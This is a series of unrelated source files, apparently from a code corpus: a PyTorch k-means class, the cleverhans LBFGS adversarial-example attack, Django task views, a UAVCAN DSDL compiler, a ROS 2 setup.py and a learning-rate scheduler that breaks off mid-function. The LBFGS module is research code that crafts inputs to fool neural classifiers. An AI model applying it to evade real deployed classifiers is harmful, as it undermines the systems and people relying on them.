del sub_labels
return (maxsims, labels)
def compute_centroids_loop(self, data, labels):
"""
data: torch.Tensor, shape : [l, d_vector, n_data]
labels: torch.Tensor, shape : [l, n_data]
return: torch.Tensor, shape : [l, d_vector, n_clusters]
"""
### Naive method with loop
l, d, m = data.shape
centroids = torch.zeros(l, d, self.n_clusters, device=data.device, dtype=data.dtype)
for j in range(l):
unique_labels, counts = labels[j].unique(return_counts=True)
for i, count in zip(unique_labels, counts):
centroids[j, :, i] = data[j, :, labels[j]==i].sum(dim=1) / count
return centroids
def compute_centroids(self, data, labels):
"""
data: torch.Tensor, shape : [l, d_vector, n_data]
labels: torch.Tensor, shape : [l, n_data]
return: torch.Tensor, shape: [l, d_vector, n_clusters]
"""
if data.device == torch.device("cpu"):
centroids = self.compute_centroids_loop(data, labels)
else:
centroids = self.compute_centroids_cuda(data, labels, k=self.n_clusters)
return centroids
def _compute_centroids_hungry(self, data, labels):
### Memory hungry method
# expanded_labels = labels[None].expand(self.n_clusters, -1) #[k, n], k=n_clusters <>
if self.arange is None\
or self.arange.dtype != data.dtype\
or self.arange.device != data.device:
self.arange = torch.arange(self.n_clusters, device=data.device) #[k] <k*8>
mask = labels[None, :] == self.arange[:, None] #[k, n] <k*n*1 + k*8>
mask_sum = mask.sum(dim=-1) #[k] <k*n*1 + k*12>
mask = mask.float() # <k*n*5 + k*12> LARGEST MEMORY USE!!!
centroids = mask @ data # <k*n*4 + k*12 + k*d*4>
del mask
centroids.div_(mask_sum[..., :, None]) # <k*d*4 + k*12>
del mask_sum
nan_mask = centroids!=centroids #[k, d] # <k*d*8>
centroids[nan_mask] = 0 # remove NaNs
return centroids
def fit(self, data, centroids=None):
"""
Perform K-means clustering, and return final labels
data: torch.Tensor, shape : [l, d_vector, n_data]
return: torch.Tensor, shape : [l, n_data], dtype: long
"""
assert data.is_contiguous(), "use .contiguous()"
best_centroids = None
best_error = 1e32
best_labels = None
best_inertia = 1e32
tm = time()
for i in range(self.n_redo):
tm_i = time()
if centroids is None:
centroids = self.initialize_centroids(data)
for j in range(self.max_iter):
# 1 iteration of clustering
maxsims, labels = self.get_labels(data, centroids) #top1 search
new_centroids = self.compute_centroids(data, labels)
error = self.calculate_error(centroids, new_centroids)
centroids = new_centroids
inertia = self.calculate_inertia(maxsims)
if self.verbose >= 3:
print(f"----iteration {j} of {i}th redo, error={error.item()}, inertia={inertia.item()}")
if error <= self.tol:
break
if inertia < best_inertia:
best_centroids = centroids
best_error = error
best_labels = labels
best_inertia = inertia
if self.verbose >= 2:
print(f"--{i}th redo finished, error: {error.item()}, inertia: {inertia.item()}time spent:{round(time()-tm_i, 4)} sec")
self.register_buffer("centroids", best_centroids)
if self.verbose >= 1:
print(f"finished {self.n_redo} redos in {round(time()-tm, 4)} sec, final_inertia: {best_inertia}")
return best_labels
def predict(self, query):
"""
Predict closest cluster center each sample in query belongs to.
query: torch.Tensor, shape : [l, d_vector, n_query]
return: torch.Tensor, shape : [l, n_query]
"""
assert self.centroids is not None, "kmeans is not trained"
_, labels = self.get_labels(query, self.centroids)
return labels
def topk(self, query, k):
"""
Predict the top-k closest cluster centers of each sample in query
query: torch.Tensor, shape : [l, d_vector, n_query]
k: int, should be in range [1, n_centroids]
"""
assert self.centroids is not None, "kmeans is not trained"
        assert k <= self.n_clusters, "k is too large"
sims = self.sim(query, self.centroids) #[l, n_query, n_clusters]
topkv, topki = sims.topk(dim=-1, k=k) #[l, n_query, k]
return (topkv, topki)
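if __name__ == "__main__":
    # Minimal CPU usage sketch (added for illustration, not part of the original module).
    # It assumes the package-relative imports above resolve; shapes follow the docstrings,
    # i.e. data is [n_kmeans, d_vector, n_data] and must be contiguous.
    data = torch.randn(4, 16, 1000).contiguous()      # 4 independent k-means problems
    kmeans = MultiKMeans(n_clusters=8, distance="euclidean", max_iter=25, verbose=1)
    labels = kmeans.fit(data)                         # [4, 1000] cluster assignments
    query = torch.randn(4, 16, 10).contiguous()
    print(labels.shape, kmeans.predict(query).shape)  # torch.Size([4, 1000]) torch.Size([4, 10])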
|
the-stack_106_15868
|
"""The LBFGS attack
"""
import numpy as np
import tensorflow as tf
from cleverhans.attacks.attack import Attack
from cleverhans.compat import reduce_sum, softmax_cross_entropy_with_logits
from cleverhans.model import CallableModelWrapper, Model, wrapper_warning
from cleverhans import utils
from cleverhans import utils_tf
_logger = utils.create_logger("cleverhans.attacks.lbfgs")
tf_dtype = tf.as_dtype('float32')
class LBFGS(Attack):
"""
LBFGS is the first adversarial attack for convolutional neural networks,
  and is a targeted & iterative attack.
Paper link: "https://arxiv.org/pdf/1312.6199.pdf"
:param model: cleverhans.model.Model
:param sess: tf.Session
:param dtypestr: dtype of the data
:param kwargs: passed through to super constructor
"""
def __init__(self, model, sess, dtypestr='float32', **kwargs):
if not isinstance(model, Model):
wrapper_warning()
model = CallableModelWrapper(model, 'probs')
super(LBFGS, self).__init__(model, sess, dtypestr, **kwargs)
self.feedable_kwargs = ('y_target',)
self.structural_kwargs = [
'batch_size', 'binary_search_steps', 'max_iterations',
'initial_const', 'clip_min', 'clip_max'
]
def generate(self, x, **kwargs):
"""
Return a tensor that constructs adversarial examples for the given
input. Generate uses tf.py_func in order to operate over tensors.
:param x: (required) A tensor with the inputs.
:param kwargs: See `parse_params`
"""
assert self.sess is not None, \
'Cannot use `generate` when no `sess` was provided'
self.parse_params(**kwargs)
if self.y_target is None:
self.y_target, nb_classes = self.get_or_guess_labels(x, kwargs)
self.targeted_attack = False
else:
_, nb_classes = self.get_or_guess_labels(x, kwargs)
self.targeted_attack = True
attack = LBFGS_impl(
self.sess, x, self.model.get_logits(x),
self.y_target, self.targeted_attack,
self.binary_search_steps, self.max_iterations, self.initial_const,
self.clip_min, self.clip_max, nb_classes, self.batch_size)
def lbfgs_wrap(x_val, y_val):
"""
Wrapper creating TensorFlow interface for use with py_func
"""
return np.array(attack.attack(x_val, y_val), dtype=self.np_dtype)
wrap = tf.py_func(lbfgs_wrap, [x, self.y_target], self.tf_dtype)
wrap.set_shape(x.get_shape())
return wrap
def parse_params(self,
y_target=None,
batch_size=1,
binary_search_steps=5,
max_iterations=1000,
initial_const=1e-2,
clip_min=0,
clip_max=1):
"""
:param y_target: (optional) A tensor with the one-hot target labels.
:param batch_size: The number of inputs to include in a batch and
process simultaneously.
:param binary_search_steps: The number of times we perform binary
search to find the optimal tradeoff-
                                constant between norm of the perturbation
and cross-entropy loss of classification.
:param max_iterations: The maximum number of iterations.
:param initial_const: The initial tradeoff-constant to use to tune the
relative importance of size of the perturbation
and cross-entropy loss of the classification.
:param clip_min: (optional float) Minimum input component value
:param clip_max: (optional float) Maximum input component value
"""
self.y_target = y_target
self.batch_size = batch_size
self.binary_search_steps = binary_search_steps
self.max_iterations = max_iterations
self.initial_const = initial_const
self.clip_min = clip_min
self.clip_max = clip_max
class LBFGS_impl(object):
"""
Return a tensor that constructs adversarial examples for the given
input. Generate uses tf.py_func in order to operate over tensors.
:param sess: a TF session.
:param x: A tensor with the inputs.
:param logits: A tensor with model's output logits.
:param targeted_label: A tensor with the target labels.
:param binary_search_steps: The number of times we perform binary
search to find the optimal tradeoff-
constant between norm of the purturbation
and cross-entropy loss of classification.
:param max_iterations: The maximum number of iterations.
:param initial_const: The initial tradeoff-constant to use to tune the
                        relative importance of size of the perturbation
and cross-entropy loss of the classification.
:param clip_min: Minimum input component value
:param clip_max: Maximum input component value
:param num_labels: The number of classes in the model's output.
:param batch_size: Number of attacks to run simultaneously.
"""
def __init__(self, sess, x, logits, targeted_label, targeted_attack,
binary_search_steps, max_iterations, initial_const, clip_min,
clip_max, nb_classes, batch_size):
self.sess = sess
self.x = x
self.logits = logits
assert logits.op.type != 'Softmax'
self.targeted_label = targeted_label
self.targeted_attack = targeted_attack
self.binary_search_steps = binary_search_steps
self.max_iterations = max_iterations
self.initial_const = initial_const
self.clip_min = clip_min
self.clip_max = clip_max
self.batch_size = batch_size
self.repeat = self.binary_search_steps >= 10
self.shape = tuple([self.batch_size] +
list(self.x.get_shape().as_list()[1:]))
self.ori_img = tf.Variable(
np.zeros(self.shape), dtype=tf_dtype, name='ori_img')
self.const = tf.Variable(
np.zeros(self.batch_size), dtype=tf_dtype, name='const')
self.score = softmax_cross_entropy_with_logits(
labels=self.targeted_label, logits=self.logits)
self.l2dist = reduce_sum(tf.square(self.x - self.ori_img))
# small self.const will result small adversarial perturbation
# targeted attack aims at minimize loss against target label
# untargeted attack aims at maximize loss against True label
if self.targeted_attack:
self.loss = reduce_sum(self.score * self.const) + self.l2dist
else:
self.loss = -reduce_sum(self.score * self.const) + self.l2dist
self.grad, = tf.gradients(self.loss, self.x)
def attack(self, x_val, targets):
"""
Perform the attack on the given instance for the given targets.
"""
def lbfgs_objective(adv_x, self, targets, oimgs, CONST):
""" returns the function value and the gradient for fmin_l_bfgs_b """
loss = self.sess.run(
self.loss,
feed_dict={
self.x: adv_x.reshape(oimgs.shape),
self.targeted_label: targets,
self.ori_img: oimgs,
self.const: CONST
})
grad = self.sess.run(
self.grad,
feed_dict={
self.x: adv_x.reshape(oimgs.shape),
self.targeted_label: targets,
self.ori_img: oimgs,
self.const: CONST
})
return loss, grad.flatten().astype(float)
def attack_success(out, target, targeted_attack):
""" returns attack result """
if targeted_attack:
return out == target
else:
return out != target
# begin the main part for the attack
from scipy.optimize import fmin_l_bfgs_b
oimgs = np.clip(x_val, self.clip_min, self.clip_max)
CONST = np.ones(self.batch_size) * self.initial_const
# set the lower and upper bounds accordingly
lower_bound = np.zeros(self.batch_size)
upper_bound = np.ones(self.batch_size) * 1e10
# set the box constraints for the optimization function
clip_min = self.clip_min * np.ones(oimgs.shape[:])
clip_max = self.clip_max * np.ones(oimgs.shape[:])
clip_bound = list(zip(clip_min.flatten(), clip_max.flatten()))
# placeholders for the best l2 and instance attack found so far
o_bestl2 = [1e10] * self.batch_size
o_bestattack = np.copy(oimgs)
for outer_step in range(self.binary_search_steps):
_logger.debug(" Binary search step %s of %s",
outer_step, self.binary_search_steps)
      # The last iteration (if we run many steps) repeats the search once.
if self.repeat and outer_step == self.binary_search_steps - 1:
CONST = upper_bound
# optimization function
adv_x, _, __ = fmin_l_bfgs_b(
lbfgs_objective,
oimgs.flatten().astype(float),
args=(self, targets, oimgs, CONST),
bounds=clip_bound,
maxiter=self.max_iterations,
iprint=0)
adv_x = adv_x.reshape(oimgs.shape)
assert np.amax(adv_x) <= self.clip_max and \
np.amin(adv_x) >= self.clip_min, \
'fmin_l_bfgs_b returns are invalid'
# adjust the best result (i.e., the adversarial example with the
# smallest perturbation in terms of L_2 norm) found so far
preds = np.atleast_1d(
utils_tf.model_argmax(self.sess, self.x, self.logits,
adv_x))
_logger.debug("predicted labels are %s", preds)
l2s = np.zeros(self.batch_size)
for i in range(self.batch_size):
l2s[i] = np.sum(np.square(adv_x[i] - oimgs[i]))
for e, (l2, pred, ii) in enumerate(zip(l2s, preds, adv_x)):
if l2 < o_bestl2[e] and attack_success(pred, np.argmax(targets[e]),
self.targeted_attack):
o_bestl2[e] = l2
o_bestattack[e] = ii
# adjust the constant as needed
for e in range(self.batch_size):
if attack_success(preds[e], np.argmax(targets[e]),
self.targeted_attack):
# success, divide const by two
upper_bound[e] = min(upper_bound[e], CONST[e])
if upper_bound[e] < 1e9:
CONST[e] = (lower_bound[e] + upper_bound[e]) / 2
else:
# failure, either multiply by 10 if no solution found yet
# or do binary search with the known upper bound
lower_bound[e] = max(lower_bound[e], CONST[e])
if upper_bound[e] < 1e9:
CONST[e] = (lower_bound[e] + upper_bound[e]) / 2
else:
CONST[e] *= 10
_logger.debug(" Successfully generated adversarial examples "
"on %s of %s instances.",
sum(upper_bound < 1e9), self.batch_size)
o_bestl2 = np.array(o_bestl2)
mean = np.mean(np.sqrt(o_bestl2[o_bestl2 < 1e9]))
_logger.debug(" Mean successful distortion: {:.4g}".format(mean))
# return the best solution found
o_bestl2 = np.array(o_bestl2)
return o_bestattack
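# Illustrative usage sketch (not part of this file): `model` is assumed to be a
# cleverhans.model.Model (a plain callable is wrapped automatically), `sess` an active
# tf.Session, `x` an input placeholder and `y_target` a one-hot target-label tensor.
#
#   attack = LBFGS(model, sess)
#   adv_x = attack.generate(x, y_target=y_target,
#                           binary_search_steps=5, max_iterations=1000,
#                           initial_const=1e-2, clip_min=0., clip_max=1.)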
|
the-stack_106_15869
|
import json
import datetime
import random
from picklefield import PickledObjectField
from django.shortcuts import render
from django.http import HttpResponse
from django_q.tasks import Async, schedule
from django_q.models import Schedule, Task
# Create your views here.
class CJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime("%Y-%m-%d")
else:
return json.JSONEncoder.default(self, obj)
def index(request):
return render(request, 'xxx/index.html', {})
def task_handler(request):
if request.method == 'GET':
tasks = list(Task.objects.values('id', 'name', 'started', 'stopped', 'result', 'group'))
return HttpResponse(json.dumps(tasks, cls=CJsonEncoder), content_type="application/json")
elif request.method == 'POST':
num = json.loads(str(request.body, 'utf-8')).get('num')
opts = {'task_name': 'fib' + str(num),
'group': 'fib'}
task_id = Async('xxx.tasks.fib', int(num), q_options=opts).run()
return HttpResponse({"task_id": task_id}, content_type="application/json")
def schedule_handler(request):
if request.method == 'GET':
schedules = list(Schedule.objects.values('name', 'schedule_type', 'next_run'))
return HttpResponse(json.dumps(schedules, cls=CJsonEncoder), content_type="application/json")
elif request.method == 'POST':
data = json.loads(str(request.body, 'utf-8'))
schedule_type = data.get('schedule_type')
name = data.get('name')
schedule('xxx.tasks.fib', random.randint(1, 38),
name=name,
schedule_type=schedule_type,
q_options={
'task_name': 'xxx',
'timeout': 60}
)
        return HttpResponse(json.dumps({'name': name}), content_type="application/json")
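# Hypothetical URL wiring for these views (paths are illustrative only, not from this app):
#
#   from django.urls import path
#   urlpatterns = [
#       path('', index),
#       path('tasks/', task_handler),
#       path('schedules/', schedule_handler),
#   ]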
|
the-stack_106_15872
|
#
# UAVCAN DSDL compiler for libuavcan
#
# Copyright (C) 2014 Pavel Kirienko <[email protected]>
#
'''
This module implements the core functionality of the UAVCAN DSDL compiler for libuavcan.
Supported Python versions: 3.2+, 2.7.
It accepts a list of root namespaces and produces the set of C++ header files for libuavcan.
It is based on the DSDL parsing package from pyuavcan.
'''
from __future__ import division, absolute_import, print_function, unicode_literals
import sys, os, logging, errno, re
from .pyratemp import Template
from uavcan import dsdl
# Python 2.7 compatibility
try:
str = unicode
except NameError:
pass
OUTPUT_FILE_EXTENSION = 'hpp'
OUTPUT_FILE_PERMISSIONS = 0o444 # Read only for all
TEMPLATE_FILENAME = os.path.join(os.path.dirname(__file__), 'data_type_template.tmpl')
__all__ = ['run', 'logger', 'DsdlCompilerException']
class DsdlCompilerException(Exception):
pass
logger = logging.getLogger(__name__)
def run(source_dirs, include_dirs, output_dir):
'''
This function takes a list of root namespace directories (containing DSDL definition files to parse), a
possibly empty list of search directories (containing DSDL definition files that can be referenced from the types
that are going to be parsed), and the output directory path (possibly nonexistent) where the generated C++
header files will be stored.
    Note that this module features lazy write, i.e. if an output file already exists and its content is not going
    to change, it will not be overwritten. This makes it possible to avoid unnecessary recompilation of dependent
    object files.
Args:
source_dirs List of root namespace directories to parse.
include_dirs List of root namespace directories with referenced types (possibly empty). This list is
                        automatically extended with source_dirs.
output_dir Output directory path. Will be created if doesn't exist.
'''
assert isinstance(source_dirs, list)
assert isinstance(include_dirs, list)
output_dir = str(output_dir)
types = run_parser(source_dirs, include_dirs + source_dirs)
if not types:
die('No type definitions were found')
logger.info('%d types total', len(types))
run_generator(types, output_dir)
# -----------------
def pretty_filename(filename):
try:
a = os.path.abspath(filename)
r = os.path.relpath(filename)
return a if '..' in r else r
except ValueError:
return filename
def type_output_filename(t):
assert t.category == t.CATEGORY_COMPOUND
return t.full_name.replace('.', os.path.sep) + '.' + OUTPUT_FILE_EXTENSION
def makedirs(path):
try:
try:
os.makedirs(path, exist_ok=True) # May throw "File exists" when executed as root, which is wrong
except TypeError:
os.makedirs(path) # Python 2.7 compatibility
except OSError as ex:
if ex.errno != errno.EEXIST: # http://stackoverflow.com/questions/12468022
raise
def die(text):
raise DsdlCompilerException(str(text))
def run_parser(source_dirs, search_dirs):
try:
types = dsdl.parse_namespaces(source_dirs, search_dirs)
except dsdl.DsdlException as ex:
logger.info('Parser failure', exc_info=True)
die(ex)
return types
def run_generator(types, dest_dir):
try:
template_expander = make_template_expander(TEMPLATE_FILENAME)
dest_dir = os.path.abspath(dest_dir) # Removing '..'
makedirs(dest_dir)
for t in types:
logger.info('Generating type %s', t.full_name)
filename = os.path.join(dest_dir, type_output_filename(t))
text = generate_one_type(template_expander, t)
write_generated_data(filename, text)
except Exception as ex:
logger.info('Generator failure', exc_info=True)
die(ex)
def write_generated_data(filename, data):
dirname = os.path.dirname(filename)
makedirs(dirname)
# Lazy update - file will not be rewritten if its content is not going to change
if os.path.exists(filename):
with open(filename) as f:
existing_data = f.read()
if data == existing_data:
logger.info('Up to date [%s]', pretty_filename(filename))
return
logger.info('Rewriting [%s]', pretty_filename(filename))
os.remove(filename)
else:
logger.info('Creating [%s]', pretty_filename(filename))
# Full rewrite
with open(filename, 'w') as f:
f.write(data)
try:
os.chmod(filename, OUTPUT_FILE_PERMISSIONS)
except (OSError, IOError) as ex:
logger.warning('Failed to set permissions for %s: %s', pretty_filename(filename), ex)
def type_to_cpp_type(t):
if t.category == t.CATEGORY_PRIMITIVE:
cast_mode = {
t.CAST_MODE_SATURATED: '::uavcan::CastModeSaturate',
t.CAST_MODE_TRUNCATED: '::uavcan::CastModeTruncate',
}[t.cast_mode]
if t.kind == t.KIND_FLOAT:
return '::uavcan::FloatSpec< %d, %s >' % (t.bitlen, cast_mode)
else:
signedness = {
t.KIND_BOOLEAN: '::uavcan::SignednessUnsigned',
t.KIND_UNSIGNED_INT: '::uavcan::SignednessUnsigned',
t.KIND_SIGNED_INT: '::uavcan::SignednessSigned',
}[t.kind]
return '::uavcan::IntegerSpec< %d, %s, %s >' % (t.bitlen, signedness, cast_mode)
elif t.category == t.CATEGORY_ARRAY:
value_type = type_to_cpp_type(t.value_type)
mode = {
t.MODE_STATIC: '::uavcan::ArrayModeStatic',
t.MODE_DYNAMIC: '::uavcan::ArrayModeDynamic',
}[t.mode]
return '::uavcan::Array< %s, %s, %d >' % (value_type, mode, t.max_size)
elif t.category == t.CATEGORY_COMPOUND:
return '::' + t.full_name.replace('.', '::')
elif t.category == t.CATEGORY_VOID:
return '::uavcan::IntegerSpec< %d, ::uavcan::SignednessUnsigned, ::uavcan::CastModeSaturate >' % t.bitlen
else:
raise DsdlCompilerException('Unknown type category: %s' % t.category)
def generate_one_type(template_expander, t):
t.short_name = t.full_name.split('.')[-1]
t.cpp_type_name = t.short_name + '_'
t.cpp_full_type_name = '::' + t.full_name.replace('.', '::')
t.include_guard = t.full_name.replace('.', '_').upper() + '_HPP_INCLUDED'
# Dependencies (no duplicates)
def fields_includes(fields):
def detect_include(t):
if t.category == t.CATEGORY_COMPOUND:
return type_output_filename(t)
if t.category == t.CATEGORY_ARRAY:
return detect_include(t.value_type)
return list(sorted(set(filter(None, [detect_include(x.type) for x in fields]))))
if t.kind == t.KIND_MESSAGE:
t.cpp_includes = fields_includes(t.fields)
else:
t.cpp_includes = fields_includes(t.request_fields + t.response_fields)
t.cpp_namespace_components = t.full_name.split('.')[:-1]
t.has_default_dtid = t.default_dtid is not None
# Attribute types
def inject_cpp_types(attributes):
void_index = 0
for a in attributes:
a.cpp_type = type_to_cpp_type(a.type)
a.void = a.type.category == a.type.CATEGORY_VOID
if a.void:
assert not a.name
a.name = '_void_%d' % void_index
void_index += 1
if t.kind == t.KIND_MESSAGE:
inject_cpp_types(t.fields)
inject_cpp_types(t.constants)
t.all_attributes = t.fields + t.constants
t.union = t.union and len(t.fields)
else:
inject_cpp_types(t.request_fields)
inject_cpp_types(t.request_constants)
inject_cpp_types(t.response_fields)
inject_cpp_types(t.response_constants)
t.all_attributes = t.request_fields + t.request_constants + t.response_fields + t.response_constants
t.request_union = t.request_union and len(t.request_fields)
t.response_union = t.response_union and len(t.response_fields)
# Constant properties
def inject_constant_info(constants):
for c in constants:
if c.type.kind == c.type.KIND_FLOAT:
float(c.string_value) # Making sure that this is a valid float literal
c.cpp_value = c.string_value
else:
int(c.string_value) # Making sure that this is a valid integer literal
c.cpp_value = c.string_value
if c.type.kind == c.type.KIND_UNSIGNED_INT:
c.cpp_value += 'U'
if t.kind == t.KIND_MESSAGE:
inject_constant_info(t.constants)
else:
inject_constant_info(t.request_constants)
inject_constant_info(t.response_constants)
# Data type kind
t.cpp_kind = {
t.KIND_MESSAGE: '::uavcan::DataTypeKindMessage',
t.KIND_SERVICE: '::uavcan::DataTypeKindService',
}[t.kind]
# Generation
text = template_expander(t=t) # t for Type
text = '\n'.join(x.rstrip() for x in text.splitlines())
text = text.replace('\n\n\n\n\n', '\n\n').replace('\n\n\n\n', '\n\n').replace('\n\n\n', '\n\n')
text = text.replace('{\n\n ', '{\n ')
return text
def make_template_expander(filename):
'''
Templating is based on pyratemp (http://www.simple-is-better.org/template/pyratemp.html).
The pyratemp's syntax is rather verbose and not so human friendly, so we define some
custom extensions to make it easier to read and write.
The resulting syntax somewhat resembles Mako (which was used earlier instead of pyratemp):
Substitution:
${expression}
Line joining through backslash (replaced with a single space):
${foo(bar(very_long_arument=42, \
second_line=72))}
Blocks:
% for a in range(10):
% if a == 5:
${foo()}
% endif
% endfor
The extended syntax is converted into pyratemp's through regexp substitution.
'''
with open(filename) as f:
template_text = f.read()
# Backslash-newline elimination
template_text = re.sub(r'\\\r{0,1}\n\ *', r' ', template_text)
# Substitution syntax transformation: ${foo} ==> $!foo!$
template_text = re.sub(r'([^\$]{0,1})\$\{([^\}]+)\}', r'\1$!\2!$', template_text)
# Flow control expression transformation: % foo: ==> <!--(foo)-->
template_text = re.sub(r'(?m)^(\ *)\%\ *(.+?):{0,1}$', r'\1<!--(\2)-->', template_text)
# Block termination transformation: <!--(endfoo)--> ==> <!--(end)-->
template_text = re.sub(r'\<\!--\(end[a-z]+\)--\>', r'<!--(end)-->', template_text)
# Pyratemp workaround.
# The problem is that if there's no empty line after a macro declaration, first line will be doubly indented.
# Workaround:
# 1. Remove trailing comments
# 2. Add a newline after each macro declaration
template_text = re.sub(r'\ *\#\!.*', '', template_text)
template_text = re.sub(r'(\<\!--\(macro\ [a-zA-Z0-9_]+\)--\>.*?)', r'\1\n', template_text)
# Preprocessed text output for debugging
# with open(filename + '.d', 'w') as f:
# f.write(template_text)
template = Template(template_text)
def expand(**args):
# This function adds one indentation level (4 spaces); it will be used from the template
args['indent'] = lambda text, idnt = ' ': idnt + text.replace('\n', '\n' + idnt)
# This function works like enumerate(), telling you whether the current item is the last one
def enum_last_value(iterable, start=0):
it = iter(iterable)
count = start
last = next(it)
for val in it:
yield count, False, last
last = val
count += 1
yield count, True, last
args['enum_last_value'] = enum_last_value
return template(**args)
return expand
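# Illustrative usage sketch (the paths below are placeholders, not part of this module):
#
#   import logging
#   logging.basicConfig(level=logging.INFO)
#   run(source_dirs=['dsdl/uavcan'],          # root namespaces to compile
#       include_dirs=[],                      # extra namespaces with referenced types
#       output_dir='include/dsdlc_generated')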
|
the-stack_106_15873
|
from setuptools import find_packages
from setuptools import setup
package_name = 'ros2component'
setup(
name=package_name,
version='0.12.0',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['ros2cli'],
zip_safe=True,
author='Michel Hidalgo',
author_email='[email protected]',
maintainer='Claire Wang, Mabel Zhang',
maintainer_email='[email protected], [email protected]',
url='https://github.com/ros2/ros2cli/tree/master/ros2component',
download_url='https://github.com/ros2/ros2cli/releases',
keywords=[],
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
],
description='The component command for ROS 2 command line tools.',
long_description="""\
The package provides the component command for the ROS 2 command line tools.""",
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'ros2cli.command': [
'component = ros2component.command.component:ComponentCommand',
],
'ros2cli.extension_point': [
'ros2component.verb = ros2component.verb:VerbExtension',
],
'ros2component.verb': [
'list = ros2component.verb.list:ListVerb',
'load = ros2component.verb.load:LoadVerb',
'standalone = ros2component.verb.standalone:StandaloneVerb',
'types = ros2component.verb.types:TypesVerb',
'unload = ros2component.verb.unload:UnloadVerb',
],
}
)
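# The entry points above extend the ros2 CLI; once this package is installed, the
# registered verbs are invoked as, for example:
#   ros2 component list
#   ros2 component types
# (verb names follow the 'ros2component.verb' entries declared above)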
|
the-stack_106_15874
|
import numpy as np
import pandas as pd
__all__ = (
"one_ns_timedelta",
"one_s_timedelta",
"unix_begin_time"
)
one_ns_timedelta = pd.Timedelta(1)
one_s_timedelta = np.timedelta64(1, 's')
unix_begin_time = pd.Timestamp(0, unit='s')
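# Informal example of what these constants are for (not part of the module's API):
# converting a pandas Timestamp into Unix seconds.
#
#   >>> (pd.Timestamp("1970-01-02") - unix_begin_time) / one_s_timedelta
#   86400.0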
|
the-stack_106_15875
|
import numpy as np
import scipy.stats as sps
import torch
import models.dataset as md
import models.model as mm
import utils.smiles as chem_smiles
from running_modes.configurations.general_configuration_envelope import GeneralConfigurationEnvelope
from running_modes.configurations.transfer_learning.adaptive_learning_rate_configuration import \
PromiscuityAdaptiveLearningRateConfiguration
from running_modes.transfer_learning.logging.transfer_learning_logger import TransferLearningLogger
from utils.enums.adaptive_learning_rate_enum import AdaptiveLearningRateEnum
class PromiscuityAdaptiveLearningRate:
def __init__(self, model: mm.Model, main_config: GeneralConfigurationEnvelope,
configuration: PromiscuityAdaptiveLearningRateConfiguration):
self._adaptive_learning_rate_enum = AdaptiveLearningRateEnum()
self._config = configuration
self._optimizer = torch.optim.Adam(model.network.parameters(), lr=self._config.start)
self._learning_rate_restarted_times = 0
self._logger = TransferLearningLogger(main_config)
self._lr_scheduler = self._initialize_lr_scheduler()
self._lr_adaptative_metric = []
self._data = {}
def _initialize_lr_scheduler(self):
if self._config.mode == self._adaptive_learning_rate_enum.EXPONENTIAL:
self._logger.log_message(f"Using exponential learning rate decay (gamma={self._config.gamma}, "
f"step={self._config.step})")
return torch.optim.lr_scheduler.StepLR(
self._optimizer, step_size=self._config.step, gamma=self._config.gamma)
elif self._config.mode == self._adaptive_learning_rate_enum.ADAPTIVE:
self._logger.log_message(f"Using adaptative learning rate decay (gamma={self._config.gamma}, "
f"threshold={self._config.threshold}, avg={self._config.average_steps})")
return torch.optim.lr_scheduler.ReduceLROnPlateau(
self._optimizer, mode="min", factor=self._config.gamma, patience=self._config.patience,
threshold=self._config.threshold)
else:
return None
def update_lr_scheduler(self, epoch):
if self._config.mode == self._adaptive_learning_rate_enum.EXPONENTIAL:
self._lr_scheduler.step(epoch=epoch)
if self._config.mode == self._adaptive_learning_rate_enum.ADAPTIVE:
metric = np.mean(self._lr_adaptative_metric[-self._config.average_steps:])
self._lr_scheduler.step(metric, epoch=epoch)
if self.get_lr() <= self._config.restart_value and self._config.restart_times > self._learning_rate_restarted_times:
self._logger.log_message(f"Learning rate restarted ({self._config.restart_times}): {self.get_lr()} "
f"-> {self._config.start}")
for param_group in self._optimizer.param_groups:
param_group['lr'] = self._config.start
self._learning_rate_restarted_times += 1
def get_lr(self):
return self._optimizer.param_groups[0]["lr"]
def get_jsd_joined_data(self):
return self._data["jsd_joined"]
def get_jsd_data(self):
return self._data["jsd"]
def learning_rate_is_valid(self):
return self.get_lr() >= self._config.min
def clear_gradient(self):
self._optimizer.zero_grad()
def optimizer_step(self):
self._optimizer.step()
def collect_stats(self, epoch, model_path, training_set_path, validation_set_path=None):
model = mm.Model.load_from_file(model_path, sampling_mode=True)
training_nlls = self._calc_nlls(model, training_set_path, self._config.sample_size)
training_nlls = self._amplify_dataset(training_nlls, self._config.sample_size)
sampled_smiles, sampled_nlls = self._sample_smiles_and_calculate_loss(model, self._config.sample_size)
if validation_set_path:
validation_nlls = self._calc_nlls(model, validation_set_path, self._config.sample_size)
validation_nlls = self._amplify_dataset(validation_nlls, self._config.sample_size)
self._update_nll_with_validation(sampled_nlls, validation_nlls, training_nlls)
else:
validation_nlls = None
self._update_nll(sampled_nlls=sampled_nlls, training_nlls=training_nlls)
self._logger.log_timestep(lr=self.get_lr(), epoch=epoch,
sampled_smiles=sampled_smiles,
sampled_nlls=sampled_nlls, validation_nlls=validation_nlls,
training_nlls=training_nlls,
jsd_data=self.get_jsd_data(),
jsd_joined_data=self.get_jsd_joined_data(), model=model)
self._lr_adaptative_metric.append(self.get_jsd_joined_data())
def _smiles_to_mols(self, smiles):
smiles_and_mols = [(smi, chem_smiles.to_mol(smi)) for smi in smiles]
return smiles_and_mols
def _sample_smiles_and_calculate_loss(self, model, sample_size):
sampled_smis, sampled_nlls = model.sample_smiles(num=sample_size)
return sampled_smis, sampled_nlls
def _calc_nlls(self, model, path, sample_size):
return np.concatenate(
list(md.calculate_nlls_from_model(model, chem_smiles.read_smiles_file(path, num=sample_size))[0]))
def _update_nll_with_validation(self, sampled_nlls, validation_nlls, training_nlls):
def jsd(dists):
num_dists = len(dists)
avg_dist = np.sum(dists, axis=0) / num_dists
return np.sum([sps.entropy(dist, avg_dist) for dist in dists]) / num_dists
self._data["jsd"] = {
"sampled.validation": jsd([sampled_nlls, validation_nlls]),
"sampled.training": jsd([sampled_nlls, training_nlls]),
"training.validation": jsd([training_nlls, validation_nlls])
}
self._data["jsd_joined"] = jsd([sampled_nlls, training_nlls, validation_nlls])
def _update_nll(self, sampled_nlls, training_nlls):
def jsd(dists):
